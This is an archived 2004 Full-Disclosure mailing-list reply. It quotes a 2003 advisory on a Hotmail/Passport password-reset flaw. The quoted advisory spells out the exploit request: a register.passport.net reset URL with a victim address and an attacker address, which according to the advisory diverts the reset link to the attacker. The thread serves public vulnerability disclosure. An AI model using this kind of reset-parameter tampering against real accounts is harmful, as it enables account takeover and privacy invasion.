[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040421064738.84731.qmail@web8002.mail.in.yahoo.com>
From: bhattsharma at yahoo.co.in (anirudh bhatt)
Subject: Re: Hotmail & Passport (.NET Accounts) Vulnerability
Isnt this the same vulnerabilitywhich was first
reported on FD(almost a year ago..) ..and supposedly
made FD "famous" (as regards being noticed by the
press).
> I am forwarding this as it may impact people whom
> depend on MSN or
> passport systems for business reasons. Contrary to
> what at
> least one of the full-disclosure follow-ups reports,
> it does work.
>
> D
>
>
> ---------- Forwarded message ----------
> Date: Wed, 7 May 2003 19:50:51 -0700 (PDT)
> From: Muhammad Faisal Rauf Danka
> To: full-disclosure@...ts.netsys.com
> Subject: [Full-Disclosure] Hotmail & Passport (.NET
> Accounts) Vulnerability
>
> Hotmail & Passport (.NET Accounts) Vulnerability
>
> There is a very serious and stupid vulnerability or
> badcoding in Hotmail /
> Passport???s (.NET
> Accounts)
>
> I tried sending emails several times to Hotmail /
> Passport contact
> addresses, but always met
> with the NLP bots.
>
> I guess I don???t need to go in details of how
> cruical and important Hotmail
> / Passport???s
> .NET Account passport is to anyone.
>
> You name it and they have it, E-Commerce, Credit
> Card processing, Personal
> Emails, Privacy Issues,
> Corporate Espionage, maybe stalkers and what not.
>
> It is so simple that it is funny.
>
> All you got to do is hit the following in your
> browser:
>
>
https://register.passport.net/emailpwdreset.srf?lc=1033&em=vanecarolina13@hotmail.com&id=&cb=&prefem=careverga7@.com&rst=1
>
> And you???ll get an email on attacker@...acker.com
> asking you to click on a
> url something like
> this:
>
>
http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&URLNum=0&lc=1033
>
> >From that url, you can reset the password and I
> don???t think I need to say
> >anything more about
> it.
>
> Vulnerability / Flaw discovered : 12th April 2003
> Vendor / Owner notified : Yes (as far as emailing
> them more than 10 times is
> concerned)
>
>
> Regards
> --------
> Muhammad Faisal Rauf Danka
>
>
_________________________________________________________________
> Charla con tus amigos en l?nea mediante MSN
> Messenger:
> http://messenger.latam.msn.com/
________________________________________________________________________
Yahoo! India Matrimony: Find your partner online. http://yahoo.shaadi.com/india-matrimony/
Powered by blists - more mailing lists